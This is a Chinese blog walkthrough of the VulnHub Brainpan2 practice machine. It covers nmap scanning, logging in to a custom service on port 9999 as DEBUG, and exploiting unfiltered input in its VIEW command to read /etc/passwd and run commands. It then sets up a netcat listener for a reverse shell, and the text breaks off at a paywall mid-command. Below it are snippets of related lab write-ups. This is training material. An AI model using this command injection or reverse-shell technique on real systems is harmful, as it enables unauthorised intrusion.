20-VulnHub-Brainpan2

最新推荐文章于 2024-10-26 15:23:55 发布
最新推荐文章于 2024-10-26 15:23:55 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: vulnhub50 文章标签: python pycharm linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43809826/article/details/119995233
版权

20-VulnHub-Brainpan2

靶机地址:http://www.vulnhub.com/entry/brainpan-2,56/

目标:得到root权限&找到flag.txt
作者:尼德霍格007
时间:2020-08-30

一、信息收集

扫描目标主机

nmap -sP 192.168.21.0/24

image-20210716194202070

扫描开放端口

nmap -A -p- 192.168.21.142

image-20210716221737417

可以看到开放了9999和10000两个端口,前一个是abyss服务,后一个是http服务

先看一下熟悉的http服务

整个页面就一张图片,源码也没有有用信息

image-20210829122911194

看一下9999端口,使用nc连接

nc 192.168.21.142 9999

image-20210829123123487

它看起来像是一个类似于brainpan1.0的二进制文件

试了一下GUEST账户,没有有用的权限

image-20210829123534242

image-20210829123619106

但是好像可以用DEBUG登录

二、发现漏洞

进来之后可以查看系统和文件信息

image-20210829123851466

而且还可以查看/etc/passwd文件的内容

image-20210829124036024

由此看起来没有对VIEW命令进行输入过滤,验证一下

image-20210829124204039

确实可行,id命令也正常执行了,这就好办了

三、获取shell&提权

试一下反向shell

kali开启监听

nc -lnvp 443

image-20210829124424268

这边输入反向shell命令

;nc -e
最低0.47元/天 解锁文章
vulnhub-Brainpan (考点:windows exe和linux elf下的两种缓冲区溢出)
冬萍子癸水
04-21 2237
https://www.vulnhub.com/entry/brainpan-1,51/ 安装为nat网络 arp-scan -l。比平常多出来的那个就是靶机了 nmap C:\root> nmap -A 192.168.189.188 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 22:11 EDT Nmap scan repo...
vulnhub靶机BSides-Vancouver-2018-Workshop渗透笔记
liver100day的博客
05-15 581
渗透测试实战–BSides-Vancouver-2018-Workshop 靶机下载/安装 靶机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/ 靶机IP地址:未知 kali渗透机地址:192.168.75.128 1.主机发现
VulnHub靶场笔记 - Brainpan(OSCP推荐靶场)
m0_62652276的博客
01-02 1401
首先,在main函数中,buf可以接收的大小为1000,但此处strcpy()函数将source(即buf)拷贝到Destination中,但Destination的大小为520,说明可以进行溢出。打开WinDbg,选择“运行可执行程序”,选择brainpain.exe,然后在命令框中输入g,开始运行。重启WinDbg中的程序,g运行;不过,上述代码中,需要将单引号和双引号互换,可以在记事本中借助中间字符完成这个操作。重启WinDbg中的程序,g运行,然后在Kali中执行exp.py。
OSCP Brainpan 靶机渗透
Shadow的博客
03-24 5050
Brainpan靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-24 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Brainpan主机ip为172.16.1.8 然后我们nmap一下看看哪些端口是开放的 nmap -p- -A 172.16.1.8 只开放了9999.
靶机Brainpan 缓冲区溢出getshell OSCP必考内容
weixin_43738494的博客
05-30 354
sudo运行这个文件,显然就是帮助文件提权了,这里需要首先进入一个显示受限的shell(也就是一次显示不完的shell),或者将你的nc传输数据字节数限制一下,否则无法利用manual显示不完全执行命令,这里转成一个pty shell。这里要注意的是,虽然对面使用cmd,但是不一定就是windows主机,需要注意的是“缓冲区溢出漏洞最好一次到位,不然容易把对面程序干崩导致无法利用。因为运行环境是windows系统,所以必要的免杀和混淆是一定要做的, 443是https的端口,一般防火墙不会拦截。
17-VulnHub-Brainpan 1
尼德霍格007
08-12 970
17-VulnHub-brainpan 靶机地址:https://www.vulnhub.com/entry/brainpan-1,51/ 目标:得到root权限&找到四个flag.txt 作者:尼德霍格007 时间:2021-8-11 注意:此次渗透在VMware虚拟机中演示,kali机IP地址为192.168.21.128。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 nmap扫描网段 nmap -sP 192.168.21.0/24 扫描到靶机
红队打靶:Brainpan打靶思路详解(vulnhub
Bossfrank的博客
07-13 1107
本文是vulnhub靶机brainpan的详细打靶过程。涉及到的知识点包括strings命令、ImmunityDebugger的基本操作、缓冲区溢出漏洞、ret2shellcode、sudo提权等。理解构造溢出的全局思路是关键,操作过程中还有许多有关编码免杀绕过、内存小端显示等细节问题需要理解。
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3413
每台都做一做,然后记录在博客里.供自己和大家一起学习.
vulnhub之靶机技术栈
li1136594919的博客
08-08 300
靶机名 getshell 提权 备注 symfonos4 sql注入+文件包含 python序列化与反序列化 VPLE 集成练习靶场 CSRF-Minefield-V1.0 CSRF专项练习靶机
vulhub Brainpan:1
hee_mee的博客
05-30 1199
ZeroNIl
abyss:深渊VSCOde主题
04-01
深渊 截屏 。 更多信息 。 。
Abyss Web服务器,高效防墙系统
q2315702359的博客
05-13 1938
Abyss Web服务器,高效防墙系统   什么是Abyss Web Server X2?   Abyss Web服务器是可用于Windows,macOS和Linux操作系统的紧凑型Web服务器。   尽管占用空间很小,但它支持HTTP / 1.1,受保护的SSL / TLS关系(HTTPS),自动配置和免费提供来自Let'sEncrypt®(ACME v2)的免费证书,IPv6,即时HTTP压缩,通过创建动态内容CGI / FastCGI脚本,ISAPI扩展,本机ASP.NET,HTTP ...
vulvhub-----Hacker-KID靶机
woshicainiao666的博客
02-18 1101
bashrc 文件是一个在 Bash shell 启动时自动执行的脚本文件。Bash 是 Linux 和其他 UNIX-like 系统中常用的 shell,而 .bashrc 文件通常位于用户的主目录下(例如,/home/username/ 或 ~),并且通常包含用户的个性化设置和别名等。想要执行成功,需要root进程进行注入,python2.7 exp.py 2185,root进程太多,写一个简单的shell脚本。,是一个注册页面,查看源码,发现是xml格式,猜测是XXE漏洞,抓包验证。
BlackHat论文解读: HTTP 标头,请求走私,缓存中毒
Liao_Wenzhe的博客
02-10 3645
概念: 1.现代web架构:基于反向代理转发的二层结构,如下图1所示。 2.http标头,请求走私:在http-header中修改制定参数参数名或值,以实现在front 到 back中调用链中的攻击,造成缓存攻击,ip限制,速率绕过等。如下图2所示。 3. 缓存中毒:利用front的缓存,覆盖原始访问的内容,如下图3所示,我们可以任意更改rsp-body里的值。 影响: 1. 绕过网关 IP 限制和速率限制(仅仅修改转发参数即可攻击漏洞): API Gateway 允许你使用以下资源
VulnHub-Brainpan1 靶机笔记
最新发布
LINGX5的博客
10-26 1162
靶机地址:https://vulnhub.com/entry/brainpan-1,51/#download 这台靶机是很好的缓冲区溢出漏洞利用的练习靶机,涉及到逆向和缓冲区溢出漏洞挖掘的一些知识。
【HACKER KID: 1.0.1靶机】
qq_40646572的博客
05-23 2053
信息搜集 开启靶机。 使用nmap扫描,发现存活靶机,192.168.85.145,靶机开放端口为53,80,9999。 进一步搜集下对应段开启的服务。 发现,9999端口开启的是tornado服务。 先打开web网站,看下。 好像再提示挖掘?还是使用dig工具?先放下,继续搜集信息。 #app.html页面源码,发现存在提示,给了一个参数。这个参数应该是页面数,先尝试下。 发现page_no=21时,返回数据不同。 提示我们这个网站还绑定了一个域名,先添加到/etc/hosts文本中。
10 个用于网络管理员进行高级扫描的端口扫描工具
热门推荐
allway2的博客
07-19 3万+
一秒钟扫描数千个端口!让我们看看网络管理员如何做到这一点。您如何知道网络上特定IP或IP范围的可用端口?好吧,如果您正在考虑手动检查,那将需要很多时间。最好使用工具更快地扫描端口。之前,我谈到了如何并收到反馈以涵盖用于扫描Intranet网络的工具。有多种端口扫描方法——TCP、FIN、ICMP、Idle、SYN、UDP、ACK、Windows等。并非每个扫描仪都具备这些方法,因此请选择适合您要求的方法。所以,给你。TCP端口扫描器顾名思义——它只能扫描TCP端口。命令-r。......
【网络安全】nmap 学习总结
roshy的专栏
02-01 2595
1、常见的扫描结果 在开启了防火墙的win7 sp1个人系统上用-A 参数扫描几乎无法扫描出任何信息。 端口状态全是:Filtered。关闭防火墙后可以扫描出开放端口及服务版本信息。由此可见对于个来电脑来说开启防护墙是非常重要的。 端口状态:filtered(被过滤的) 由于包过滤阻止探测报文到达端口, Nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备,路由器规则 或者主...
常见36种web渗透测试漏洞描述及解决方法
weixin_44600998的博客
03-15 3338
36种web渗透测试漏洞描述及解决方法
VulnHub-Tr0ll1靶机学习笔记与文档整理
资源摘要信息:"VulnHub-Tr0ll1.zip文件是一个包含了VulnHub-Tr0ll1靶机学习笔记及相关文档的压缩包。VulnHub是一个为安全研究人员和爱好者提供真实网络环境的平台,用于实践渗透测试技能。Tr0ll1是VulnHub上的一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值